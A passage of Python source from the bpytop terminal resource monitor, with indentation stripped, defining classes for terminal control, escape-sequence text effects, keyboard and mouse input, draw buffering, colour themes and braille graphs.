except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if ARG_BOXES:
_new_boxes: List = []
for _box in ARG_BOXES.split():
if _box in ["cpu", "mem", "net", "proc"]:
_new_boxes.append(_box)
CONFIG.shown_boxes = " ".join(_new_boxes)
del _box, _new_boxes
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
CONFIG.show_battery = False
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
old_boxes: List = []
min_width: int = 0
min_height: int = 0
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if Init.running: cls.resized = False; return
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and cls.old_boxes == Box.boxes and not force: return
if force: Collector.collect_interrupt = True
if cls.old_boxes != Box.boxes:
w_p = h_p = 0
cls.min_width = cls.min_height = 0
cls.old_boxes = Box.boxes.copy()
for box_class in Box.__subclasses__():
for box_name in Box.boxes:
if box_name in str(box_class).capitalize():
if not (box_name == "cpu" and "proc" in Box.boxes) and not (box_name == "net" and "mem" in Box.boxes) and w_p + box_class.width_p <= 100:
w_p += box_class.width_p
cls.min_width += getattr(box_class, "min_w", 0)
if not (box_name in ["mem", "net"] and "proc" in Box.boxes) and h_p + box_class.height_p <= 100:
h_p += box_class.height_p
cls.min_height += getattr(box_class, "min_h", 0)
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < cls.min_width or cls._h < cls.min_height):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < cls.min_width or cls._h < cls.min_height:
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, box_width, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < cls.min_width else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < cls.min_height else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.d(1)}{Mv.l(25)}{Colors.default}{Colors.black_bg}Current config need: {cls.min_width} x {cls.min_height}{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
Collector.proc_counter = 1
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color and returns string ."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor postion
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
if not CONFIG.truecolor or LOW_COLOR:
self.escape = f'{self.truecolor_to_256(rgb=self.dec, depth=self.depth)}'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def truecolor_to_256(rgb: Tuple[int, int, int], depth: str="fg") -> str:
out: str = ""
pre: str = f'\033[{"38" if depth == "fg" else "48"};5;'
greyscale: Tuple[int, int, int] = ( rgb[0] // 11, rgb[1] // 11, rgb[2] // 11 )
if greyscale[0] == greyscale[1] == greyscale[2]:
out = f'{pre}{232 + greyscale[0]}m'
else:
out = f'{pre}{round(rgb[0] / 51) * 36 + round(rgb[1] / 51) * 6 + round(rgb[2] / 51) + 16}m'
return out
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{c};{c};{c}m'
else:
color = f'{Color.truecolor_to_256(rgb=(c, c, c), depth=depth)}'
elif len(hexa) == 7:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
else:
color = f'{Color.truecolor_to_256(rgb=(int(hexa[1:3], base=16), int(hexa[3:5], base=16), int(hexa[5:7], base=16)), depth=depth)}'
except ValueError as e:
errlog.exception(f'{e}')
else:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{r};{g};{b}m'
else:
color = f'{Color.truecolor_to_256(rgb=(r, g, b), depth=depth)}'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
no_zero: bool
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None, no_zero: bool = False):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
self.no_zero = no_zero
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if self.no_zero and not (new and v == 0 and side == "left") and h == self.height - 1 and value[side] < 1: value[side] = 1
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else (THEME.inactive_fg if self.last < 5 else self.colors[self.last])}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
